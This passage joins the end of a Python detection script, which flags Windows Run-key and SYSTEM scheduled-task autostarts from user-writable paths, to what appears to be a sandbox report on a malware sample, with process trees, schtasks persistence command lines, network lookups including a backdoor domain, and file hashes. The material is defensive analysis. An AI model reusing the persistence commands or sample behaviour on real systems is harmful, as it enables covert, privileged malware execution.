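# Locations a standard user can create files in; an installer writing an
# autostart for a binary here is the pattern to question.
USER_WRITABLE = tuple(re.compile(p) for p in (
    r"^[a-z]:\\users\\[^\\]+\\appdata\\",
    r"^[a-z]:\\users\\public\\",
    r"^[a-z]:\\programdata\\",
))


def tokenize(cmd):
    """Windows-style split where a double-quoted run is one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def user_writable(path):
    p = path.strip('"').lower()
    return any(rx.match(p) for rx in USER_WRITABLE)


def inspect_registry(ev):
    """Flag Run/RunOnce values whose command lives in a user-writable path."""
    m = RUN_KEY.match(ev["key"])
    if not m or not ev["op"].lower().startswith("set value"):
        return []
    scope = "HKLM" if m.group(1).lower() == "machine" else "HKCU"
    target = ev["value"].strip('"').lower()
    if not user_writable(target):
        return []
    return [("Run key autostart from user-writable path",
             f"{scope}\\{m.group(2)}\\{m.group(3)}", target)]


def parse_schtasks(cmdline):
    """Map /switch -> value (None for bare switches such as /Create)."""
    toks = tokenize(cmdline)
    opts, i = {}, 1
    while i < len(toks):
        if toks[i].startswith("/"):
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                opts[toks[i].lower()] = toks[i + 1]
                i += 2
                continue
            opts[toks[i].lower()] = None
        i += 1
    return opts


def inspect_task(ev):
    """Flag tasks created to run a user-writable binary as SYSTEM."""
    toks = tokenize(ev["cmdline"])
    if not toks or re.split(r"[\\/]", toks[0])[-1].lower() not in ("schtasks", "schtasks.exe"):
        return []
    o = parse_schtasks(ev["cmdline"])
    if "/create" not in o:
        return []
    runas = (o.get("/ru") or "").lower()
    action = (o.get("/tr") or "").strip('"').lower()
    # /SC ONSTART makes this a boot-time SYSTEM launch of a Temp-resident file.
    if runas in ("system", r"nt authority\system") and user_writable(action):
        return [("SYSTEM scheduled task runs user-writable binary", o.get("/tn") or "", action)]
    return []


def analyze(registry_events, process_events):
    found = []
    for ev in registry_events:
        found += inspect_registry(ev)
    for ev in process_events:
        found += inspect_task(ev)
    return found


if __name__ == "__main__":
    for sig, name, target in analyze(REGISTRY_EVENTS, PROCESS_EVENTS):
        print(f"{sig}: {name} -> {target}")
```

Run against the records above this yields four findings: the three Run values and the SYSTEM task. The task and the user-hive Run value share the name `wininit` and the same Temp-resident target, so a hunt that joins autostart names across the registry and the task scheduler would tie the two together even if only one survived a cleanup.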
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\mbr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe"
C:\mbr.exe
"C:\mbr.exe"
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe" InjUpdate
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x320 0x478
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 216.58.204.78:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\mbr.exe
| MD5 | c85aa1da29f23a5a711e2793d0630b5a |
| SHA1 | e079ef1963a710db2e35380e508eef86ff371fb1 |
| SHA256 | a19c688c6bebe44cc77ecf6bd998bb4f1799cefc91c5bd32cc8d6381e0177139 |
| SHA512 | 162e75f513518d5979f3c4a0e7ca6bf4b4333646bebee73a703c43c67c735f6ed244db25674f786881061418600123e92265e51e9ee5b6d34669ef71b72038cc |
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
| MD5 | 578650d2b82375bb0f6be3a9108585b0 |
| SHA1 | 8f25b9a24254c2ec99ee5625c70a0ae7067dc68b |
| SHA256 | 5ee16b324a60878ccef849bec862a4fa551cb304d8ce4056d49df10fb8ec9f2f |
| SHA512 | 4c46d53bab8df399a63b33ac4c4bba2c99663b31fcd3ebb6bd01a9ccf1648a61a7034879fafced99adb9c60388590efb4462e404b9d5da7d8e2e60b480ffc657 |
C:\Users\Admin\AppData\Local\Temp\1a3cimMa.xlsm
| MD5 | e566fc53051035e1e6fd0ed1823de0f9 |
| SHA1 | 00bc96c48b98676ecd67e81a6f1d7754e4156044 |
| SHA256 | 8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15 |
| SHA512 | a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04 |
C:\rick.wav
| MD5 | 2634c1ac24432e18601bcd8171b8248e |
| SHA1 | 01135b2ace7d4437dd8d57a4dd88b0fd45c5bf35 |
| SHA256 | 66f05a63cc9ae2c641a0fe82ea6ada8142464853dd83b749a562235090adb20d |
| SHA512 | 9fc42b412c9aebb29cf6f0e2969b2c5515086114e44f3d4e259a51ee08824d4f1d25ac2f586d5e8915261191399dc7d53f91a6b897d2d5a756ce2ccabddd7cd3 |